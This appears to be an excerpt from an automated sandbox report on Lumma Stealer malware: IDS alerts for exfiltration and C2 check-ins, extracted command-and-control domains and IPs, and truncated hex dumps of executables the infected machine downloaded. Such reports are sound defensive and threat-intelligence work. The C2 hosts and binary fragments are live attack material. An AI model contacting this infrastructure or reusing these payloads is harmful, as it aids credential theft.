Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50252 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50292 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50296 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50297 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50264 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50294 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50273 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50316 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50324 -> 23.197.127.21:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50313 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: l.exe.23.dr
Source: global traffic TCP traffic: 192.168.2.5:50312 -> 5.79.74.169:12000
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 